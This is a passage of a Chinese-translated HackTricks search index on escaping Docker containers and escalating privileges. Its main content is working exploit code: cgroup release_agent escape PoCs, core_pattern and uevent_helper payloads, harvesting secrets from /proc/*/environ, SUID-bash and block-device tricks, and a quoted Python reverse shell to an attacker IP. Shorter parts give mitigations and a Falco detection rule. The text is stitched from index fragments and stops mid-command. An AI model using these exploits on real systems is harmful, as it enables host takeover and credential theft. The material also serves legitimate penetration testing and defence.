特权逃逸滥用敏感挂载 有几个文件可能被挂载,这些文件提供了 关于底层主机的信息 。其中一些甚至可能指示 当发生某些事情时由主机执行的内容 (这将允许攻击者逃离容器)。 滥用这些文件可能允许: release_agent(之前已经讨论过) binfmt_misc core_pattern uevent_helper modprobe 然而,您可以在此页面找到 其他敏感文件 进行检查: Sensitive Mounts","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Privileged","id":"1632","title":"Privileged"},"1633":{"body":"在多个场合,您会发现 容器从主机挂载了一些卷 。如果这个卷没有正确配置,您可能能够 访问/修改敏感数据 :读取秘密,修改ssh authorized_keys… bash docker run --rm -it -v /:/host ubuntu bash 另一个有趣的例子可以在 这个博客 中找到,其中指出主机的 /usr/bin/ 和 /bin/ 文件夹被挂载在容器内,允许容器的 root 用户修改这些文件夹中的二进制文件。因此,如果 cron 作业使用了那里的任何二进制文件,例如 /etc/cron.d/popularity-contest,这允许通过修改 cron 作业使用的二进制文件来逃离容器。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 任意挂载","id":"1633","title":"任意挂载"},"1634":{"body":"如果您作为 root 访问容器 ,并且该容器挂载了主机的某个文件夹,并且您已经 作为非特权用户逃离到主机 并对挂载的文件夹具有读取权限。 您可以在 容器 内的 挂载文件夹 中创建一个 bash suid 文件 ,并 从主机执行它 以进行特权提升。 bash cp /bin/bash . #From non priv inside mounted folder\\n# You need to copy it from the host as the bash binaries might be diferent in the host and in the container\\nchown root:root bash #From container as root inside mounted folder\\nchmod 4777 bash #From container as root inside mounted folder\\nbash -p #From non priv inside mounted folder","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 使用 2 个 shell 和主机挂载进行特权提升","id":"1634","title":"使用 2 个 shell 和主机挂载进行特权提升"},"1635":{"body":"如果您在 容器内以 root 身份访问 ,并且您已经 以非特权用户身份逃逸到主机 ,您可以利用这两个 shell 来 在主机内进行特权升级 ,前提是您在容器内具有 MKNOD 能力(默认情况下是这样的),正如 在这篇文章中解释的 。 拥有这样的能力,容器内的 root 用户被允许 创建块设备文件 。设备文件是用于 访问底层硬件和内核模块 的特殊文件。例如,/dev/sda 块设备文件提供了 读取系统磁盘上的原始数据 的访问权限。 Docker 通过强制执行 cgroup 策略来防止容器内块设备的滥用,该策略 阻止块设备的读/写操作 。然而,如果在容器内 创建了块设备 ,则可以通过 /proc/PID/root/ 目录从容器外部访问它。此访问要求 进程所有者在容器内外相同 。 利用 示例来自这篇 写作 : bash # On the container as root\\ncd /\\n# Crate device\\nmknod sda b 8 0\\n# Give access to it\\nchmod 777 sda # Create the nonepriv user of 
the host inside the container\\n## In this case it\'s called augustus (like the user from the host)\\necho \\"augustus:x:1000:1000:augustus,,,:/home/augustus:/bin/bash\\" >> /etc/passwd\\n# Get a shell as augustus inside the container\\nsu augustus\\nsu: Authentication failure\\n(Ignored)\\naugustus@3a453ab39d3d:/backend$ /bin/sh\\n/bin/sh\\n$ bash # On the host # get the real PID of the shell inside the container as the new https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/~/changes/3847/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#privilege-escalation-with-2-shells user\\naugustus@GoodGames:~$ ps -auxf | grep /bin/sh\\nroot 1496 0.0 0.0 4292 744 ? S 09:30 0:00 \\\\_ /bin/sh -c python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.12\\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"sh\\")\'\\nroot 1627 0.0 0.0 4292 756 ? S 09:44 0:00 \\\\_ /bin/sh -c python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.12\\",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"sh\\")\'\\naugustus 1659 0.0 0.0 4292 712 ? 
S+ 09:48 0:00 \\\\_ /bin/sh\\naugustus 1661 0.0 0.0 6116 648 pts/0 S+ 09:48 0:00 \\\\_ grep /bin/sh # The process ID is 1659 in this case\\n# Grep for the sda for HTB{ through the process:\\naugustus@GoodGames:~$ grep -a \'HTB{\' /proc/1659/root/sda\\nHTB{7h4T_w45_Tr1cKy_1_D4r3_54y}","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Privilege Escalation with 2 shells","id":"1635","title":"Privilege Escalation with 2 shells"},"1636":{"body":"如果您可以访问主机的进程,您将能够访问存储在这些进程中的大量敏感信息。运行测试实验室: docker run --rm -it --pid=host ubuntu bash 例如,您将能够使用类似 ps auxn 的命令列出进程,并在命令中搜索敏感细节。 然后,您可以 访问 /proc/ 中主机的每个进程,您可以通过运行来窃取它们的环境秘密 : bash for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done\\n/proc/988058/environ\\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\\nHOSTNAME=argocd-server-69678b4f65-6mmql\\nUSER=abrgocd\\n... 您还可以 访问其他进程的文件描述符并读取它们打开的文件 : bash for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \\\\>; done > fds.txt\\nless fds.txt\\n...omitted for brevity...\\nlrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/2 -> /dev/pts/0\\nlrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp\\n# You can open the secret filw with:\\ncat /proc/635813/fd/4 您还可以 终止进程并导致 DoS 。 warning 如果您以某种方式拥有 对容器外部进程的特权访问权限 ,您可以运行类似 nsenter --target --all 或 nsenter --target --mount --net --pid --cgroup 的命令,以 在与该进程相同的 ns 限制 (希望没有)下 运行一个 shell 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » hostPID","id":"1636","title":"hostPID"},"1637":{"body":"docker run --rm -it --network=host ubuntu bash 如果一个容器配置了 Docker host networking driver (--network=host) ,那么该容器的网络栈就不会与 Docker 主机隔离(容器共享主机的网络命名空间),并且容器不会分配自己的 IP 地址。换句话说, 容器将所有服务直接绑定到主机的 IP 。此外,容器可以 拦截主机在共享接口上发送和接收的所有网络流量 tcpdump -i eth0。 例如,您可以使用此方法 嗅探甚至伪造主机与元数据实例之间的流量 。 如以下示例所示: Writeup: How to contact Google SRE: Dropping a shell in cloud SQL Metadata service MITM allows root 
privilege escalation (EKS / GKE) 您还将能够访问 绑定到 localhost 的网络服务 ,或者甚至访问 节点的元数据权限 (这可能与容器可以访问的权限不同)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » hostNetwork","id":"1637","title":"hostNetwork"},"1638":{"body":"bash docker run --rm -it --ipc=host ubuntu bash 使用 hostIPC=true,您可以访问主机的进程间通信(IPC)资源,例如 /dev/shm 中的 共享内存 。这允许读取/写入其他主机或 pod 进程使用的相同 IPC 资源。使用 ipcs 进一步检查这些 IPC 机制。 检查 /dev/shm - 查找此共享内存位置中的任何文件: ls -la /dev/shm 检查现有的 IPC 设施 – 您可以检查是否正在使用任何 IPC 设施,使用 /usr/bin/ipcs。检查命令为: ipcs -a","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » hostIPC","id":"1638","title":"hostIPC"},"1639":{"body":"如果系统调用 unshare 没有被禁止,您可以通过运行来恢复所有能力: bash unshare -UrmCpf bash\\n# Check them with\\ncat /proc/self/status | grep CapEff","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 恢复能力","id":"1639","title":"恢复能力"},"164":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP & HSRP Attacks","id":"164","title":"GLBP & HSRP Attacks"},"1640":{"body":"帖子中解释的第二种技术 https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/ 指出如何利用用户命名空间滥用绑定挂载,以影响主机内部的文件(在特定情况下,删除文件)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » 用户命名空间滥用通过符号链接","id":"1640","title":"用户命名空间滥用通过符号链接"},"1641":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » CVEs","id":"1641","title":"CVEs"},"1642":{"body":"如果您可以以 root 身份执行 docker exec(可能使用 sudo),您可以尝试通过利用 CVE-2019-5736 来提升权限(漏洞 在这里 )。该技术基本上将 主机 的 /bin/sh 二进制文件 从容器中 覆盖 ,因此任何执行 docker exec 的人都可能触发有效载荷。 相应地更改有效载荷,并使用 go build main.go 构建 main.go。生成的二进制文件应放置在 docker 容器中以供执行。 执行时,一旦显示 [+] Overwritten /bin/sh successfully,您需要从主机机器执行以下命令: docker exec -it /bin/sh 这将触发 main.go 文件中存在的有效载荷。 更多信息: https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html tip 容器可能还会受到其他 CVE 的影响,您可以在 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list 找到列表","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Runc 漏洞 (CVE-2019-5736)","id":"1642","title":"Runc 漏洞 (CVE-2019-5736)"},"1643":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker 自定义逃逸","id":"1643","title":"Docker 自定义逃逸"},"1644":{"body":"命名空间: 进程应该通过命名空间与其他进程 完全隔离 ,因此我们无法通过命名空间与其他进程交互(默认情况下无法通过 IPC、unix 套接字、网络服务、D-Bus、其他进程的 /proc 进行通信)。 根用户 :默认情况下,运行进程的用户是根用户(但其权限是有限的)。 能力 :Docker 保留以下能力: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep 系统调用 :这些是 根用户无法调用 的系统调用(因为缺乏能力 + Seccomp)。其他系统调用可以用来尝试逃逸。 {{#tab name=\\"x64 syscalls\\"}}\\nyaml 0x067 -- 
syslog\\n0x070 -- setsid\\n0x09b -- pivot_root\\n0x0a3 -- acct\\n0x0a4 -- settimeofday\\n0x0a7 -- swapon\\n0x0a8 -- swapoff\\n0x0aa -- sethostname\\n0x0ab -- setdomainname\\n0x0af -- init_module\\n0x0b0 -- delete_module\\n0x0d4 -- lookup_dcookie\\n0x0f6 -- kexec_load\\n0x12c -- fanotify_init\\n0x130 -- open_by_handle_at\\n0x139 -- finit_module\\n0x140 -- kexec_file_load\\n0x141 -- bpf {{#endtab}} {{#tab name=\\"arm64 syscalls\\"}} 0x029 -- pivot_root\\n0x059 -- acct\\n0x069 -- init_module\\n0x06a -- delete_module\\n0x074 -- syslog\\n0x09d -- setsid\\n0x0a1 -- sethostname\\n0x0a2 -- setdomainname\\n0x0aa -- settimeofday\\n0x0e0 -- swapon\\n0x0e1 -- swapoff\\n0x106 -- fanotify_init\\n0x109 -- open_by_handle_at\\n0x111 -- finit_module\\n0x118 -- bpf {{#endtab}} {{#tab name=\\"syscall_bf.c\\"}} `c // From a conversation I had with @arget131\\n// Fir bfing syscalss in x64 #include \\n#include \\n#include \\n#include int main()\\n{\\nfor(int i = 0; i < 333; ++i)\\n{\\nif(i == SYS_rt_sigreturn) continue;\\nif(i == SYS_select) continue;\\nif(i == SYS_pause) continue;\\nif(i == SYS_exit_group) continue;\\nif(i == SYS_exit) continue;\\nif(i == SYS_clone) continue;\\nif(i == SYS_fork) continue;\\nif(i == SYS_vfork) continue;\\nif(i == SYS_pselect6) continue;\\nif(i == SYS_ppoll) continue;\\nif(i == SYS_seccomp) continue;\\nif(i == SYS_vhangup) continue;\\nif(i == SYS_reboot) continue;\\nif(i == SYS_shutdown) continue;\\nif(i == SYS_msgrcv) continue;\\nprintf(\\"Probando: 0x%03x . . . 
\\", i); fflush(stdout);\\nif((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM))\\nprintf(\\"Error\\\\n\\");\\nelse\\nprintf(\\"OK\\\\n\\");\\n}\\n}\\n```","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker 逃逸表面","id":"1644","title":"Docker 逃逸表面"},"1645":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有关更多详细信息,请 查看来自 https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html 的博客文章。这只是一个摘要: 该技术概述了一种 从容器内执行主机代码 的方法,克服了存储驱动程序配置带来的挑战,这些配置会模糊主机上的容器文件系统路径,例如 Kata Containers 或特定的 devicemapper 设置。 关键步骤: 定位进程 ID (PIDs): 使用 Linux 伪文件系统中的 /proc//root 符号链接,可以相对于主机的文件系统访问容器内的任何文件。这绕过了需要知道主机上容器文件系统路径的要求。 PID 碰撞: 采用暴力破解的方法搜索主机上的 PIDs。这是通过依次检查 /proc//root/ 中特定文件的存在来完成的。当找到该文件时,表明相应的 PID 属于在目标容器内运行的进程。 触发执行: 猜测的 PID 路径被写入 cgroups release_agent 文件。此操作触发 release_agent 的执行。通过检查输出文件的创建来确认此步骤的成功。 利用过程涉及一系列更详细的操作,旨在通过猜测在容器内运行的进程的正确 PID 来在主机上执行有效载荷。以下是其展开方式: 初始化环境: 在主机上准备一个有效载荷脚本 (payload.sh),并为 cgroup 操作创建一个唯一的目录。 准备有效载荷: 编写并使有效载荷脚本可执行,该脚本包含要在主机上执行的命令。 设置 Cgroup: 挂载并配置 cgroup。设置 notify_on_release 标志,以确保在释放 cgroup 时执行有效载荷。 暴力破解 PID: 循环遍历潜在的 PIDs,将每个猜测的 PID 写入 release_agent 文件。这有效地将有效载荷脚本设置为 release_agent。 触发并检查执行: 对于每个 PID,写入 cgroup 的 cgroup.procs,如果 PID 正确,则触发 release_agent 的执行。循环继续,直到找到有效载荷脚本的输出,表明执行成功。 来自博客文章的 PoC: bash #!/bin/sh OUTPUT_DIR=\\"/\\"\\nMAX_PID=65535\\nCGROUP_NAME=\\"xyx\\"\\nCGROUP_MOUNT=\\"/tmp/cgrp\\"\\nPAYLOAD_NAME=\\"${CGROUP_NAME}_payload.sh\\"\\nPAYLOAD_PATH=\\"${OUTPUT_DIR}/${PAYLOAD_NAME}\\"\\nOUTPUT_NAME=\\"${CGROUP_NAME}_payload.out\\"\\nOUTPUT_PATH=\\"${OUTPUT_DIR}/${OUTPUT_NAME}\\" # Run a process for which we can search for (not needed in reality, 
but nice to have)\\nsleep 10000 & # Prepare the payload script to execute on the host\\ncat > ${PAYLOAD_PATH} << __EOF__\\n#!/bin/sh OUTPATH=\\\\$(dirname \\\\$0)/${OUTPUT_NAME} # Commands to run on the host<\\nps -eaf > \\\\${OUTPATH} 2>&1\\n__EOF__ # Make the payload script executable\\nchmod a+x ${PAYLOAD_PATH} # Set up the cgroup mount using the memory resource cgroup controller\\nmkdir ${CGROUP_MOUNT}\\nmount -t cgroup -o memory cgroup ${CGROUP_MOUNT}\\nmkdir ${CGROUP_MOUNT}/${CGROUP_NAME}\\necho 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release # Brute force the host pid until the output path is created, or we run out of guesses\\nTPID=1\\nwhile [ ! -f ${OUTPUT_PATH} ]\\ndo\\nif [ $((${TPID} % 100)) -eq 0 ]\\nthen\\necho \\"Checking pid ${TPID}\\"\\nif [ ${TPID} -gt ${MAX_PID} ]\\nthen\\necho \\"Exiting at ${MAX_PID} :-(\\"\\nexit 1\\nfi\\nfi\\n# Set the release_agent path to the guessed pid\\necho \\"/proc/${TPID}/root${PAYLOAD_PATH}\\" > ${CGROUP_MOUNT}/release_agent\\n# Trigger execution of the release_agent\\nsh -c \\"echo \\\\$\\\\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs\\"\\nTPID=$((${TPID} + 1))\\ndone # Wait for and cat the output\\nsleep 1\\necho \\"Done! Output:\\"\\ncat ${OUTPUT_PATH} tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » release_agent exploit - Relative Paths to PIDs » 利用过程","id":"1645","title":"利用过程"},"1646":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有关更多详细信息,请参阅 原始博客文章 。 这只是一个摘要:","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » Docker release_agent cgroups escape","id":"1646","title":"Docker release_agent cgroups escape"},"1647":{"body":"shell d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`\\nmkdir -p $d/w;echo 1 >$d/w/notify_on_release\\nt=`sed -n \'s/.*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab`\\ntouch /o; echo $t/c >$d/release_agent;echo \\"#!/bin/sh\\n$1 >$t/o\\" >/c;chmod +x /c;sh -c \\"echo 0 >$d/w/cgroup.procs\\";sleep 1;cat /o PoC 利用 cgroup-v1 的 release_agent 特性:当一个 cgroup 的最后一个任务退出时,如果该 cgroup 设置了 notify_on_release=1,内核(在 主机的初始命名空间中 )会执行存储在可写文件 release_agent 中的程序路径。由于该执行是在 主机上具有完全的 root 权限 ,因此获得对该文件的写入访问权限就足以实现容器逃逸。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 经典 PoC (2019)","id":"1647","title":"经典 PoC (2019)"},"1648":{"body":"准备一个新的 cgroup shell mkdir /tmp/cgrp\\nmount -t cgroup -o rdma cgroup /tmp/cgrp # 或 –o memory\\nmkdir /tmp/cgrp/x\\necho 1 > /tmp/cgrp/x/notify_on_release 将 release_agent 指向主机上攻击者控制的脚本 shell host_path=$(sed -n \'s/.*\\\\perdir=\\\\([^,]*\\\\).*/\\\\1/p\' /etc/mtab)\\necho \\"$host_path/cmd\\" > /tmp/cgrp/release_agent 投放有效载荷 shell cat <<\'EOF\' > 
/cmd\\n#!/bin/sh\\nps aux > \\"$host_path/output\\"\\nEOF\\nchmod +x /cmd 触发通知器 shell sh -c \\"echo $$ > /tmp/cgrp/x/cgroup.procs\\" # 添加自己并立即退出\\ncat /output # 现在包含主机进程","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 简短、易读的操作步骤","id":"1648","title":"简短、易读的操作步骤"},"1649":{"body":"在 2022 年 2 月,Yiqi Sun 和 Kevin Wang 发现 内核在进程写入 cgroup-v1 中的 release_agent 时并未验证能力 (函数 cgroup_release_agent_write)。 实际上 任何能够挂载 cgroup 层次结构的进程(例如通过 unshare -UrC)都可以在 初始 用户命名空间中写入任意路径到 release_agent,而无需 CAP_SYS_ADMIN 。在默认配置、以 root 运行的 Docker/Kubernetes 容器中,这允许: 提升到主机上的 root 权限;↗ 在容器未被提升的情况下实现容器逃逸。 该缺陷被分配为 CVE-2022-0492 (CVSS 7.8 / 高)并在以下内核版本中修复(以及所有后续版本): 5.16.2, 5.15.17, 5.10.93, 5.4.176, 4.19.228, 4.14.265, 4.9.299。 补丁提交:1e85af15da28 \\"cgroup: Fix permission checking\\"。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 2022 内核漏洞 – CVE-2022-0492","id":"1649","title":"2022 内核漏洞 – CVE-2022-0492"},"165":{"body":"","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » FHRP Hijacking Overview","id":"165","title":"FHRP Hijacking Overview"},"1650":{"body":"bash # prerequisites: container is run as root, no seccomp/AppArmor profile, cgroup-v1 rw inside\\napk add --no-cache util-linux # provides unshare\\nunshare -UrCm sh -c \'\\nmkdir /tmp/c; mount -t cgroup -o memory none /tmp/c;\\necho 1 > /tmp/c/notify_on_release;\\necho /proc/self/exe > /tmp/c/release_agent; # will exec /bin/busybox from host\\n(sleep 1; echo 0 > /tmp/c/cgroup.procs) &\\nwhile true; do sleep 1; done\\n\' 如果内核存在漏洞,来自 host 的 busybox 二进制文件将以完全 root 权限执行。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 容器内的最小利用代码","id":"1650","title":"容器内的最小利用代码"},"1651":{"body":"更新内核 (≥ 版本以上)。该补丁现在要求在 initial 用户命名空间中具有 CAP_SYS_ADMIN 才能写入 release_agent。 优先使用 cgroup-v2 – 
统一层次 完全移除了 release_agent 功能 ,消除了这一类的逃逸。 禁用不需要的非特权用户命名空间 : shell sysctl -w kernel.unprivileged_userns_clone=0 强制访问控制 :AppArmor/SELinux 策略拒绝在 /sys/fs/cgroup/**/release_agent 上执行 mount、openat,或丢弃 CAP_SYS_ADMIN,即使在易受攻击的内核上也能阻止该技术。 只读绑定掩码 所有 release_agent 文件(Palo Alto 脚本示例): shell for f in $(find /sys/fs/cgroup -name release_agent); do\\nmount --bind -o ro /dev/null \\"$f\\"\\ndone","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 加固与缓解措施","id":"1651","title":"加固与缓解措施"},"1652":{"body":"Falco 自 v0.32 起提供内置规则: yaml - rule: Detect release_agent File Container Escapes\\ndesc: Detect an attempt to exploit a container escape using release_agent\\ncondition: open_write and container and fd.name endswith release_agent and\\n(user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and\\nthread.cap_effective contains CAP_SYS_ADMIN\\noutput: \\"Potential release_agent container escape (file=%fd.name user=%user.name cap=%thread.cap_effective)\\"\\npriority: CRITICAL\\ntags: [container, privilege_escalation] 规则在容器内仍然拥有 CAP_SYS_ADMIN 的进程尝试写入 */release_agent 时触发。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 运行时检测","id":"1652","title":"运行时检测"},"1653":{"body":"Unit 42 – CVE-2022-0492: container escape via cgroups – 详细分析和缓解脚本。 Sysdig Falco rule & detection guide tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Docker release_agent cgroups escape » 参考","id":"1653","title":"参考"},"1654":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 暴露 /proc、/sys 和 /var 而没有适当的命名空间隔离会引入重大安全风险,包括攻击面扩大和信息泄露。这些目录包含敏感文件,如果配置错误或被未经授权的用户访问,可能导致容器逃逸、主机修改,或提供有助于进一步攻击的信息。例如,错误地挂载 -v /proc:/host/proc 可能会由于其基于路径的特性绕过 AppArmor 保护,使得 /host/proc 处于未保护状态。 您可以在 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts 中找到每个潜在漏洞的更多详细信息。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » 敏感挂载","id":"1654","title":"敏感挂载"},"1655":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » procfs 漏洞","id":"1655","title":"procfs 漏洞"},"1656":{"body":"该目录允许访问以修改内核变量,通常通过 sysctl(2),并包含几个值得关注的子目录: /proc/sys/kernel/core_pattern 在 core(5) 中描述。 如果您可以写入此文件,则可以写入一个管道 |,后跟将在崩溃发生后执行的程序或脚本的路径。 攻击者可以通过执行 mount 找到主机内的路径,并将路径写入其容器文件系统中的二进制文件。然后,崩溃一个程序以使内核在容器外执行该二进制文件。 测试和利用示例 : bash [ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access\\ncd /proc/sys/kernel\\necho \\"|$overlay/shell.sh\\" > core_pattern # Set custom handler\\nsleep 5 && ./crash & # Trigger handler 检查 this post 以获取更多信息。 示例程序崩溃: c int main(void) {\\nchar buf[1];\\nfor (int i = 0; i < 100; i++) {\\nbuf[i] = 1;\\n}\\nreturn 0;\\n} /proc/sys/kernel/modprobe 在 proc(5) 中详细说明。 包含用于加载内核模块的内核模块加载器的路径。 检查访问示例 : bash ls -l $(cat /proc/sys/kernel/modprobe) # 检查对 modprobe 的访问 /proc/sys/vm/panic_on_oom 在 
proc(5) 中引用。 一个全局标志,控制内核在发生 OOM 条件时是否崩溃或调用 OOM 杀手。 /proc/sys/fs 根据 proc(5) ,包含有关文件系统的选项和信息。 写入访问可以启用针对主机的各种拒绝服务攻击。 /proc/sys/fs/binfmt_misc 允许根据其魔术数字注册非本地二进制格式的解释器。 如果 /proc/sys/fs/binfmt_misc/register 可写,可能导致特权升级或 root shell 访问。 相关漏洞和解释: Poor man\'s rootkit via binfmt_misc 深入教程: 视频链接","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » /proc/sys","id":"1656","title":"/proc/sys"},"1657":{"body":"/proc/config.gz 如果启用了 CONFIG_IKCONFIG_PROC,可能会揭示内核配置。 对攻击者识别运行内核中的漏洞非常有用。 /proc/sysrq-trigger 允许调用 Sysrq 命令,可能导致立即重启系统或其他关键操作。 重启主机示例 : bash echo b > /proc/sysrq-trigger # 重启主机 /proc/kmsg 暴露内核环形缓冲区消息。 可以帮助内核漏洞利用、地址泄漏,并提供敏感系统信息。 /proc/kallsyms 列出内核导出符号及其地址。 对于内核漏洞开发至关重要,尤其是克服 KASLR。 地址信息在 kptr_restrict 设置为 1 或 2 时受到限制。 详细信息见 proc(5) 。 /proc/[pid]/mem 与内核内存设备 /dev/mem 交互。 历史上容易受到特权升级攻击。 更多信息见 proc(5) 。 /proc/kcore 以 ELF core 格式表示系统的物理内存。 读取可能泄漏主机系统和其他容器的内存内容。 大文件大小可能导致读取问题或软件崩溃。 详细用法见 Dumping /proc/kcore in 2019 。 /proc/kmem /dev/kmem 的替代接口,表示内核虚拟内存。 允许读取和写入,因此可以直接修改内核内存。 /proc/mem /dev/mem 的替代接口,表示物理内存。 允许读取和写入,修改所有内存需要解析虚拟地址到物理地址。 /proc/sched_debug 返回进程调度信息,绕过 PID 命名空间保护。 暴露进程名称、ID 和 cgroup 标识符。 /proc/[pid]/mountinfo 提供有关进程挂载命名空间中挂载点的信息。 暴露容器 rootfs 或映像的位置。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » 其他 /proc 中的内容","id":"1657","title":"其他 /proc 中的内容"},"1658":{"body":"/sys/kernel/uevent_helper 用于处理内核设备 uevents。 写入 /sys/kernel/uevent_helper 可以在 uevent 触发时执行任意脚本。 利用示例 : bash #### Creates a payload echo \\"#!/bin/sh\\" > /evil-helper echo \\"ps > /output\\" >> /evil-helper chmod +x /evil-helper #### Finds host path from OverlayFS mount for container host*path=$(sed -n 